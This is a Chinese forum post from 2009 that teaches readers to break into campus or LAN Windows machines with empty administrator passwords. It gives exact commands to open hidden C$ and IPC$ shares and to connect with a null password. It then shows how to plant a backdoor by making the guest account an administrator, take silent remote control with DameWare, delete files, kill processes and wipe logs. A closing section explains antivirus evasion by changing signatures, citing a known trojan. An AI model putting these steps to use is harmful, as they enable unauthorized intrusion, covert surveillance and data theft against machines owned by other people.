|
|
首先申明:
1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;
2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。
入侵工具:
一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。)
入侵步骤:
1.使用"NTscan变态扫描器",在IP处填上要扫描的IP范围,选择"WMI扫描"方式,按"开始"后就等扫描结果了。
2.使用"Recton--D贺免杀专用版"
选择"CMD命令"项,在"CMD:"中输入"net share C$=C:\",即可开启远程主机的C盘共享,以此将"C"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入"\\对方IP\C$",即可进入对方C盘。
选择"Telnet"项,在"远程主机"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在"CMD选项"中,执行命令:"net share ipc$",接着执行:"net share admin$",最后执行"net use \\***.***.***.***\IPC$ "" /user:administrator"在*处填入你入侵的主机IP。
3.使用"DameWare迷你中文版 4.5",安装后点"DameWare Mini Remote Control",在"帮助"项中选择激活产品,输入注册信息,成功注册后,进入"远程连接"窗口,在"主机"处填入IP地址,点"设置",在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选,在"用户选项"中去掉"启用用户选项菜单"。设置完成好后,就可点"连接",在弹出的对话框中点"确定"后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。 注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份。
入侵步骤补充:
1.在以上第2步中,远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。
2.Recton--D贺免杀专用版还有其他功能,在"进程"项中,可以查看远程主机的进程,并可任意结束其中进程;在"共享"项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:\,D:\等,共享好后在地址栏中输入"\\IP\C$",进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选"日志",清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。
3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):"net share C$=C:",共享system文件夹:"net share c=c:\winnt\system32",共享IPC$用:"net share IPC$"等,最后是关闭共享,关闭C盘共享:"net share C$ /del"。
4.为方便下次入侵,可以设置后门, 查看用户:"net user",激活guest用户
"net user guest /active:yes",更改guest的密码为poco:"net user guest poco",把guest的权限提升为管理员权限:"net localgroup administrators guest /add"。
5.telnet命令(DOS命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:""dir d:\",查看C盘program file文件夹:"dir c:\PROGRA~1\;",60秒倒记时关机:"shutdown -s -t 60"
补充说明:
1.net use错误原因解决:
(1)."发生系统错误 1326。 登录失败: 未知的用户名或错误密码。"
在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接,是无法访问C$等管理共享的.
(2)"发生系统错误 1327。 登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".
(3)"//IP/c$"时提示找不到网络途径。在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性,进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS".
免杀基础知识的介绍
1.免杀技术的分类
免杀技术分为文件免杀、内存免杀、行为免杀,加壳免杀、加花免杀、修改特征码免杀。
2.如何辨别杀毒软件的查杀能力
其实辩别杀毒软件的查杀能力在于它的杀毒引擎与病毒库的关系。病毒库与杀毒引擎没有直接的关系,杀毒引擎的任务和功能非常简单,就是对指定的文件或者程序进行判断其是否合法。而病毒库,只不过是对杀毒引擎的一种补充,也就是说:“我们没有足够聪明的杀毒引擎来完成这个过程”,那个过程,就是杀毒引擎对文件或者程序判断。明白这一点,就应该知道,好的杀毒软件,重要在于引擎的优秀,病毒库只不过是补充,而且病毒库越大,杀毒速度肯定会降低。因为病毒库杀毒的过程,是引擎把判断能力交给病毒库,用病毒库与指定的文件进行对比判断。
那什么是杀毒引擎和病毒库呢?
杀毒引擎它就是一套判断特定程序行为是否为病毒程序或可疑程序的技术机制,引擎不仅需要具备判断病毒的能力,还必须拥有足够的病毒清理技术和环境恢复技术,如果一款杀毒软件能查出病毒但是却无法清除、或者无法将被病毒破坏的系统环境成功恢复,那它就不能算是一款优秀的杀毒软件。
病毒库它就是杀毒软件都是根据病毒的特征来判断文件是否为病毒和是否已经感染病毒的,而这些病毒的特征会被记录在一个文件中.这个文件就是病毒库。
3.杀毒软件常见的查杀方法
(1)文件查杀
是我们的病毒特征码与杀毒软件中的病毒库中的代码来进行比较,如果病毒库中有相同的特征码,就会认为这个是病毒特征码--通俗一点讲,比如你身上一个特征 它就会认识到这个特征就是你了 。所以,对于这样的查杀模式。我们只要改变特征码杀毒软件就会不认识了。
(2)内存查杀
其实内存查杀也是通过特征码的,和文件查杀基本上一样,一个区别就是它是通过内存特征码来查杀的。
(3)行为查杀
是通过判断程序的动作来进行定义,如果程序对某个地方进行动作就会被认为是病毒了,最近发现瑞星也带有这个功能了。比如对灰鸽子做内存免杀后,发现能过。但是一运行就会被报毒,但是通过修改插入的进程我们就可以免杀。这样一个好处我发现还可以过冰刃。
4.特征码定义以及分类
杀毒软件在对文件进行查杀的时候。会挑选文件内部的一句或者几句代码来作为它识别病毒的方式。这种代码就叫做病毒的特征码。如果我们将这个代码变更或者修改。就会使得杀毒软件对其无法查杀。也就达到我们免杀的效果。
特征码主要分为:文件特征码,内存特征码,单一文件特征码,复合文件特征码,单一内存特征码,复合内存特征码。
下面具体解释下
A:文件特征码
文件特征码就是病毒程序代码中的一句或几句被杀毒软件作为识别的的代码,举例来说。你为病毒。我是杀毒软件。,我把你的名字做为查杀对象。那么你的名字就是文件特征码。
B:内存特征码
内存特征码是程序运行以后。在windows内存中的运行代码。举例来说:你是病毒,我是杀毒的。你在我家里搞了什么破坏。或者有什么痕迹。我把这些做为认定你是小偷的根据。这些根据就是内存特征码。
C:单一特征码
单一特征码就是说,一个程序中的一句代码被杀毒软件做为识别标志。修改掉就可以免杀。
D:复合特征码
一个程序中的多句代码被杀毒软件作为识别标志。有一处不修改都不能免杀。
|
|
|
发表于 2009-6-10 20:57:11
